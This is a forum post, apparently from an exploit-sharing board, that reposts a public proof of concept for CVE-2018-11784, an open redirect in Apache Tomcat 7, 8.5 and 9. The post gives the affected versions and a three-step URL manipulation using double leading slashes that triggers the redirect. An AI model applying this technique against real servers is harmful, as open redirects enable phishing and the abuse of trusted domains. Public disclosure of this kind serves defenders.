This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,702 With Us For: 244 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect # Date: 10/04/2018 # Exploit Author: Central InfoSec # Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90 # CVE : CVE-2018-11784 # Proof of Concept: # Identify a subfolder within your application http://example.com/test/ # Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash http://example.com//test # Browse to the newly created URL and the application will perform a redirection http://test/ Link to comment Share on other sites More sharing options...
Recommended Posts